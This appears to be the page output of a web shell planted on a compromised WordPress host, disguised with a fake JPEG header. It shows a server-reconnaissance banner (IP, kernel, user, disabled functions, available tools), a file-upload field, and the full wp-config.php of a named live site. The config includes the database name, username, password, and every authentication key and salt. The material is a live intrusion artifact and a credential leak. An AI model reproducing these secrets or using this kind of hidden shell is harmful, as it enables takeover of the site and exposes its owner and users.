���� JFIF fdasasfas213sdaf
Server IP : 147.79.69.203 / Your IP : 216.73.216.200 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u479334040/domains/omjaindia.com/public_html/ |
Upload File : |
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'u479334040_PMQIO' ); /** Database username */ define( 'DB_USER', 'u479334040_Lhulv' ); /** Database password */ define( 'DB_PASSWORD', '904F42DsuJ' ); /** Database hostname */ define( 'DB_HOST', '127.0.0.1' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'p9V]j*UV&A50>2Ow,kcR oC8hSAIjM.Hq8U`j+jG8W[cwb:@Br,`@IQz=nj3mBBB' ); define( 'SECURE_AUTH_KEY', 'Q4wknp-b>H,nZg.ricl%0ei9!<.h<mObs(GF9AeUD|K qM3rZqD!WG!,Ym3q-|f=' ); define( 'LOGGED_IN_KEY', '* *%] 51lca~~vdx-YH%9$C<Xq}elxlyi]&UsWU3*9FXu}&:o1oXwlr$6IgGcR:Z' ); define( 'NONCE_KEY', 'dSRQUVAeT/jg%VBj%1qth= 3G1{@=${z<:=ga=Cx)ucaI,w&q;VQN?%qcgUE!E7:' ); define( 'AUTH_SALT', '2~7SnI)@5T{)YHYk`M&+xq!`dK0fPCXRd[%iKIDF1*n} _E4:<-pme}|,jE9xV8v' ); define( 'SECURE_AUTH_SALT', '*N[uq7bVz%.nKq6nGGd;DZ[tN]S~R+Qd^zhbMFkLZOr*F2L@mvrAwxs.N34>i7.~' ); define( 'LOGGED_IN_SALT', '}uSBbZTT&/*]KcuQGu<>}DmdHBv6yKlp#$mdpLR7bMzJ;S]jcIl^V@P1/7ikqba;' ); define( 'NONCE_SALT', 'ljdiiJ1!g)@$T?px_gUScsdF!mn#o/qIr>T6%iA?jlr;I;O}H#uGFPvM44w~$yP|' ); define( 'WP_CACHE_KEY_SALT', 'C:Uv_`7gmggFY:>/DqD2`D4|6mZiGjh1of7=/PiD,=AnxWD(ReD0o}O&I>0/b3(x' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /* Add any custom values between this line and the "stop editing" line. */ /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } define( 'FS_METHOD', 'direct' ); define( 'COOKIEHASH', 'c20a552d3c6b10f7f5484be9cbd002a0' ); define( 'WP_AUTO_UPDATE_CORE', false ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';